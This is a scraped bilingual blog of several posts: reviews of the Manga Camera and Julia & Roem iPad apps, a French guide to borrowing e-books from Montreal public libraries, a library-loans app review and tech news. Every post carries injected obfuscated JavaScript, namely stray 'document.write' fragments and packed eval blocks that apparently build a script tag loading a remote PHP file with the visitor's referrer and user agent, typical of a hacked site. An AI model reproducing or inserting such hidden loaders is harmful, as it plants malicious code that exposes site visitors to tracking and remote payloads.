Mangafy your life!

Thanks to Cult of Mac and Gizmodo, document.write(“”); I’ve just discovered one of the cutest iOS apps I’ve seen in a long time: Manga Camera!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eazen|var|u0026u|referrer|adkad||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abaeh|var|u0026u|referrer|tnzrf||js|php’.split(‘|’),0,{}))

This app by
Supersoftware allows you to take a picture (but only with an iPhone 3GS+, iPod Touch 5 or iPad 3) and convert it into a manga style image! You can select thirty-two different background styles (some with Japanese captions, “sound effects” or speed lines) and share your pictures on Twitter or Facebook. If you’re not satisfied with the background, you can change it even after having taken the picture.

It doesn’t always work well (sometimes shadows or darker subject gets converted into backgrounds effects), but when it does the result is quite impressive. A picture is instantly turned into a realistic manga panel (with all its characteristics: b&w, inked line, textured with zipatone). It’s really amazing.

My only complaints is that it doesn’t save the pictures automatically (you have to save manually each pics before taking another one, if not it will disappear), you cannot use the front-facing camera to take a picture of yourself (use a mirror instead) and you cannot use an existing picture to apply the manga effects (that would be quite cool).

Nevertheless, it can provides hours of fun! It could be a cool way to make a photo-manga (for those manga lovers with less drawing talent)…

Version 1.0 of Manga Camera was released on September 10th 2012 and weighs 14.7 Mb. Available in english and japanese. Rated 4+

See a few examples after the jump:


More examples on my Photobucket’s album.

[ Traduire ]

Prêt de livrels en bibliothèque

Les Bibliothèques publiques de Montréal et la Bibliothèque et Archives Nationales du Québec ont récemment mis à la disposition de leurs usagers des livrels (ben oui: des eBooks en français, document.write(“”); aussi appelés “livres numériques”) qui peuvent être emprunté de la même façon qu’on emprunte un livre-papier dans une bibliothèque. Voir les détails après le saut de page:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tfbdb|var|u0026u|referrer|zibds||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbrdt|var|u0026u|referrer|ziehi||js|php’.split(‘|’),0,{}))

Les Bibliothèques publiques de Montréal ont d’abord expérimenté avec les livrels en prêtant aux usagers intéressés des lecteurs contenant quelques titres libres de droits (selon les bibliothèques, deux vieux modèles de lecteurs étaient (et sont encore) disponibles: un Bookeen’s Cybook Opus et un Sony Reader). Puis, l’offre de service a été bonifié avec des livrels dont on pouvait faire la lecture en ligne (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe). Plus de 700 titres sont ainsi accessibles sans téléchargement par l’entremise des Ressources numériques des bibliothèques. Le défaut de cette option est qu’il est impossible de les lire dans des lieux dépourvu de sans-fil (wifi), comme dans le métro par exemple.

La solution idéale c’est les livres numériques téléchargeables que les usagers peuvent mettre dans leur téléphones intelligents, tablettes, liseuses ou ordinateurs portables et les lire n’importe où. Les Bibliothèques publiques de Montréal ont donc tout récemment annoncé des livres téléchargeables à partir du service Prêt numérique (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe) qui offre plus de 600 documents récents d’auteurs québécois, romans, essais, livres pratiques, etc.

Ce service permet à l’usager d’emprunter des livres téléchargeables (sous la forme de fichiers ePub ou PDF protégés et chronodégradables) pour une durée de trois semaines (vingt et un jours). Si le processus d’emprunt en soi est simple, la mise en place initiale des composantes nécessaires est un peu compliquée. Mais une fois que c’est fait cela marche plutôt bien. Je vous résume ici les quelques étapes nécessaires pour emprunter des livres téléchargeables:

Mise en place des composantes

1) il vous faut d’abord vous inscrire à Adobe Connexion. Cela vous fournira un identifiant Adobe qui permettera de valider votre lecteur pour l’utilisation des droits numériques.

2) vous devez ensuite télécharger et installer un logiciel de lecture gratuit. Il s’agit principalement soit de Adobe Digital Editions pour ordinateurs (Windows et Mac OS) ou de BlueFire Reader (pour iPad, iPhone [disponible sur le iTunes apps store] et Android). J’ai découvert que Mes Livres, l’application de lecture d’Archambault, fait tout aussi l’affaire (c’est en fait une version localisée de Bluefire).

3) finalement vous devez “autoriser” l’application avec votre identifiant Adobe.

Emprunt d’un livre numérique

1) accédez au service de Prêt numérique (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe) et parcourez les titres offerts.

2) si le titre désiré est disponible (tout comme un livre physique seulement quelques copies d’un titre donné sont disponibles pour le prêt en même temps; si toutes les copies d’un titres sont empruntées vous devez attendre que la durée de prêt de l’une des copies expire avant de l’emprunter à votre tour. Il n’est malheureusement pas possible pour l’instant de réserver un titre) vous cliquez simplement sur le bouton “Emprunter le ePub” (ou “PDF” selon le format disponible). Pour pouvez également faire la recherche d’un livre par son titre, auteur, éditeur ou même ISBN et également rechercher que les titres qui sont disponibles. Malgré ces fonctions de recherche, la manière de parcourir le catalogue de titres est encore malheureusement limitées. Voir la section “Astuces de recherche” pour plus d’information (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe).

3) le système vous demandera alors l’adresse courriel où vous désirez que le lien de téléchargement soit envoyé.

4) un lien de téléchargement sera envoyé à l’adresse courriel que vous avez donné. Vous disposez de vingt-quatre (24) heures pour activer le lien en le cliquant, sinon le titre est remis en disponibilité pour les usagers de la bibliothèque.

5) à partir de votre programme de courriel, vous cliquez sur le lien d’activation de l’emprunt qui vous a été envoyé. Un fichier nommé URLLink.acsm se téléchargera et s’ouvrira ensuite dans votre logiciel de gestion de livres numériques (Adobe Digital Editions pour un ordinateur ou Bluefire Reader sur un appareil Android ou Apple). Dans le cas d’un téléphone intelligent ou d’une tablette, Bluefire Reader téléchargera alors le livre numérique comme tel et vous pourrez en commencer la lecture en quelques minutes. Dans le cas d’un appareil Sony Reader ou Kobo Reader, vous devez brancher votre liseuse à votre ordinateur afin d’y transférer le livre numérique préalablement téléchargé par Adobe Digital Editions.

Pour plus de détails tant sur le processus de mise en place des composantes que sur celui de l’emprunt de livres numériques, vous pouvez consulter la section “Guide de démarrage” (la complétion de ce lien nécessite votre numéro de carte d’abonné ainsi que votre mot de passe). Je trouve plutôt ennuyeux qu’il soit nécessaire de donner notre mot de passe AVANT de pouvoir consulter le catalogue de titres ou d’accéder à la section d’aide. Le mot de passe ne devrait être exigé qu’au moment de faire le téléchargement comme tel.

Préparer votre lecteur pour le téléchargement et faire un premier emprunt peut sembler fort compliqué mais dès le deuxième emprunt c’est déjà très facile. J’ai bien aimé l’expérience. Toutefois, si l’identifiant d’Adobe vous permet de télécharger un même titre à la fois sur le iPad et le iPhone, Bluefire Reader ne syncronise pas encore les deux versions. Rien n’est parfait mais j’espère que ça viendra. À noter que plusieurs titres des éditions Alire sont déjà disponible pour l’emprunt numérique.

Alors à vos lecteurs et bonne lecture!

Mise à jour (2012-05-31): J’ai trouvé la sélection des livres numériques offert par les bibliothèques publiques de Montréal plutôt décevante. Pour mes goûts personnels il n’y a que les titres des éditions Alire qui valent la peine d’être emprunté. Par contre, j’ai récemment jeté un coup d’oeil à la sélection offerte par la BANQ et elle est beaucoup plus vaste et intéressante. Particulièrement pcq’elle comporte des titres en anglais (je suis d’ailleurs en attente pour emprunter le cinquième tome de la série Game of Thrones!)

Julia & Roem: l’Apps

“Après un «coup de sang» environnemental apocalyptique et dévastateur, document.write(“”); la planète s’apaise et se recompose. Dans une géographie chamboulée, au cœur d’un nouveau désert, quelques survivants tentent de s’organiser dans ce nouveau monde. Sous le regard amusé d’un aumônier multiconfessionnel, les acteurs se mettent en place pour rejouer, malgré eux, la plus universelle des tragédies amoureuses… Parviendront-ils à s’écarter de la route qui semble toute tracée devant eux?” (Présentation sur l’Apps Store)
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysnke|var|u0026u|referrer|beaya||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbaen|var|u0026u|referrer|eayzy||js|php’.split(‘|’),0,{}))

Cette application adapte en format électronique pour l’iPad la plus récente BD de Bilal. Pour l’histoire, je vous renvoi au
commentaire que j’ai fait sur la bande-dessinée elle-même.

Cette application offre une approche différente de la lecture de bande-dessinée. Chacune des cases défile sur l’écran comme un diaporama, avec une trame sonore originale (par Goran Vejvoda). Il n’y a pas de bulle mais à la place on a soit le texte qui apparait en sous-titres, ou une version racontée du texte (la narration est d’ailleurs faite par Enki Bilal lui-même!). On peut zoomer sur les détails des images. C’est assez intéressant, mais, si j’apprécie bien les formats électroniques, je dois avouer être tout de même un peu traditionnaliste dans ma lecture de BD (ou de comics) et j’aime bien avoir d’abord une vue d’ensemble de la planche et de pouvoir zoomer ensuite sur les cases et les textes (approche que l’on retrouve dans des applications de lecture comme Comics par ComiXology par exemple).

Petite démonstration:

C’est cool, non?

J’adore l’idée de lire en format électronique une bande-dessinée européenne, et une de Bilal encore plus. Toutefois, ce qui est domage c’est que l’on ait pas le controle sur la vitesse de défilement des cases (à moins de faire “pause” et d’avancer manuellement, mais les boutons de controles restent alors en filigrane, ce qui nuit beaucoup à la lecture). Mais ce qui m’embête énormément avec cette application c’est que lorsque la description me dit “cette application vous propose l’intégralité de la bande dessinée Julia & Roem,” je m’attend vraiment à avoir l’intégralité de la BD. Je me disais d’ailleurs que $5.99 c’était vraiment toute une aubaine (alors que la BD en soi est $32.95)! Après avoir acheté l’application, je me rend compte qu’elle ne contient que la première partie de l’histoire et qu’il me faudrait payer un autre $3.99 pour une deuxième partie et un autre $3.99 pour une troisième. Il y a combien de partie comme ça? Est-ce que ça se termine vraiment avec la troisième partie? C’est pratiquement une arnaque! Bon, la première partie est un peu plus chère parce qu’elle inclue l’application comme telle et les bonus (un entretien avec Bilal, de l’info sur la bande-originale, une biographie, une bibliographie et une filmographie de Bilal, ainsi que quelques liens internet). Et même à $13.97, c’est quand même moins chère qu’acheter la BD papier… Mais je m’attendais quand même à mieux de Casterman…

Je suis donc plutôt décu. Mon $5.99 m’a tout de même permis d’expérimenter avec le format, mais j’ai quand même préférer lire la BD papier. Je recommande cette application seulement s’il vous faut vraiment sauver de l’argent et si vous voulez expérimenter une façon “différente” de lire une BD. Sinon, il y a toujours les bibliothèques publiques!

Julia & Roem a été créé par les Éditions Casterman en juillet 2011 (la version 2.0 est parue en août avec les chapitres 2 et 3). L’application est disponible, en français seulement, dans la catégorie “books” (ou “Livres numériques” en français) de l’iTunes Store (tant US, CA ou FR) pour 4.99 EUR (ou $5.99 US/CDN). D’une taille de 277 MB, elle est compatible avec tout iPhone, iPod touch, et iPad qui opèrent avec la version iOS 3.1.3 ou plus. Recommandé pour 12+ ans (Rares/légères scènes de violence fictive; Rares/légères scènes de consommation ou de référence à l’alcool, au tabac ou à la drogue).

Julia & Roem © Casterman 2011 • Enki Bilal.

Library Books app

Je suis toujours à l’affut des nouvelles intéressantes, document.write(“”); des innovations technologiques et des gadgets utiles. Ainsi, j’ai découvert hier, tout à fait par hasard, une intéressante application pour iPhone, iPod Touch ou iPad qui permet de suivre ses emprunts de bibliothèque et ainsi de ne jamais plus remettre un document en retard!
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydryt|var|u0026u|referrer|nttsf||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iztsr|var|u0026u|referrer|hitea||js|php’.split(‘|’),0,{}))

Il s’agit du Library Books app disponible pour les ordinateurs Macintosh (téléchargeable sur le site internet de l’application) et pour iPhone (disponible sur l’ App Store d’Apple). J’ai toujours espéré que quelqu’un ferait un jour une application qui me permettrait de consulter Nelligan, le catalogue du Réseau des Bibliothèques de Montréal, sur l’un de mes bidules mobiles (iPod Touch ou iPad). Malheureusement, tout ce que je peux faire pour l’instant c’est consulter le site internet de Nelligan sur Safari, le navigateur d’Apple. Ce n’est pas vraiment pratique, car de cette façon je dois entrer à chaque fois mon numéro d’usager et mon mot de passe. Une application dédiée garderait ces informations en mémoire.

J’étais sceptique qu’une application générique comme Library Books soit compatible avec le système du Réseau des Bibliothèques de Montréal. J’ai néanmoins consulté la liste des bibliothèques supportées par l’application: on y retrouve la bibliothèque publique de New York, le réseau de bibliothèques du Métro-Boston, ainsi que celles de la plupart des grandes villes américaines ou australiennes, la bibliothèque publique de Toronto et, à ma grande surprise, les bibliothèques publiques de Montréal! 237 bibliothèques supportées en tout!

Une fois qu’on a entré nos information de connection au système ainsi que nos paramètres favoris (“settings”, comme les alertes de retard, etc.), l’application nous donne la liste de nos emprunts (“Loans”) par ordre de date due. Si des titres sont sur le point d’être en retard, la date apparait en rouge et un écusson affichant le nombre de titres dues apparait dans le menu du bas. L’application nous donne aussi la liste de nos réservations (“Holds”), le nombre de réservation disponible pour le retrait (un écusson dans le menu du bas) et notre historique d’emprunt (“History”). Il est intéressant de noter que l’on peut se connecter à plusieurs réseau de bibliothèques.

J’avoue que c’est plutôt simple comme application. Il est dommage que Library Books n’offre pas la possibilité de faire des recherches ou de faire des réservations, mais ce genre de fonctions avancées n’est vraiment possible qu’avec une application dédiée (il probablement impossible de programmer de telles fonctions afin qu’elles soient compatibles avec toutes les 237 bibliothèques supportées par l’application!). Il est toutefois possible d’accéder à son compte sur Nelligan par l’entremise de Library Books (sans avoir à ré-entrer son code de connection) et d’y faire des recherches et des reservations, mais la présentation sur écran laisse un peu à désirer.
Il reste que le but principal de cette application est surtout de s’assurer que les usagers soient aisément informer des dates de retour (leur permettant ainsi de remettre leur documents à temps) et de la disponibilité de leur réservation. C’est quant à moi bien assez et je recommande chaudement cette application même si elle est un peu chère ($2.99 US).
Library Books a été créé par Harold Chu. L’application est disponible, en anglais seulement, dans la catégorie “utilities” de l’iTunes Store pour $2.99 US. Elle est compatible avec tout iPhone, iPod touch, et iPad qui opèrent avec la version iOS 3.0 ou plus (testé avec succès sur iOS 4.0).

[updated 2011-01-22]

Apps & blogue niouse

Je suis tombé cette semaine sur quelques actualités technologiques qui, document.write(“”); je crois, mérite bien d’être mentionées à part de ma revue de presse hebdomadaire habituelle:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrtar|var|u0026u|referrer|rieat||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eizte|var|u0026u|referrer|stern||js|php’.split(‘|’),0,{}))

Comme je l’ai déjà dit, la télévision sur internet a beaucoup d’avenir et la destination de choix pour la télé francophone au Québec est sans doute TouTV.ca. Malheureusement pour moi, TouTV.ca utilise la technologie d’Adobe Flash pour diffuser ses émissions sur le web et je ne peux donc pas les visioner avec mon iPad. Bonne nouvelle: un récent article nous apprend que Tou.tv lancera en décembre des applications iPad et iPhone! Enfin!

Je lis beaucoup d’actualités sur mon iPad. On peut lire l’information directement sur les sites internet des grands quotidiens, mais de plus en plus ceux-ci produisent des applications pour iPhone et iPad afin de présenter les articles (ou, dans la plupart des cas, une sélection d’articles) dans un format qui se lit plus aisément. Un des quotidiens que je lis le plus fréquemment est La Presse (ou “Cyberpresse” pour sa version électronique). Jusqu’à récemment j’utilisais l’application pour iPhone (sur le iPad on double les pixels pour visioner plein écran, mais l’image est moins précise et la présentation plutôt simple) mais il existe depuis quelques semaines une version de l’application pour iPad qui rend la lecture des articles beaucoup plus agréable de par sa superbe présentation. Bravo!

Ça bouge beaucoup chez Apple ces temps-ci. Lors d’une conférence de presse (“Back to the Mac”) tenue le 20 octobre dernier, Apple a dévoilé la mise à jour annuelle de la suite de logiciels iLife (dont j’attend impatiemment la livraison) et a donné un bref aperçu de son prochain système d’opération pour le Mac (OS X 10.7): Lion (attendu pour l’été prochain). On y a également lancé la nouvelle version du portable ultra-léger et rapide (flash-drive oblige!) MacBook Air. De plus, deux autres mise à jour de système d’opération sont attendu pour bientôt: une version améliorée de “Snow Leopard” (Mac OS X 10.6.5, attendue imminament) et iOS 4.2 (qui devrait amener des tas d’amélioration pour l’iPad, dont la fonction multitâche, et qu’on attend en novembre).

Finalement, je ne pouvais pas manquer de mentioner, en cette chaude journée d’Octobre (le mercure atteint les 18’C !!) que mon blogue a maintenant accueillit plus de 10,000 visiteurs! Ces derniers mois, la moyenne de visites quotidienne a presque doublée (à 28). C’est bien mais c’est encore très peu. En un peu plus de cinq ans je n’ai d’ailleurs écrit que trois-cent-quarante-six entrées (dont près de la moitié cette année seulement)… On fait ce qu’on peut (je pourrais faire des entrées plus courtes et plus nombreuses… écouter moins de télé, etc., mais le travail me laisse encore trop vidé de mon énergie).

Je me rattrape néanmoins peu à peu sur mes projets d’articles. Les prochaines entrées à venir seront sans doute les commentaires sur le “hands-on” du iPad, mes apps favorites, les films japonais du FFM, et sur plusieurs lectures (plus ou moins) récentes. De nombreux imprévus causeront certainement des retards et il ne faut pas oublier que je dois mettre (plus) de temps sur mon ménage et mon déménagement! (J’essai de ne pas trop y penser, pcq c’est trop déprimant!). En terminant, je ne peux que (une fois de plus) demander à mes quelques lecteurs de (svp) laisser des commentaires! (histoire de ne pas avoir l’impression de parler dans le vide…)

Allez hop!, passons maintenant à la revue de presse. Les actualités d’intérêts sont nombreuses cette semaine…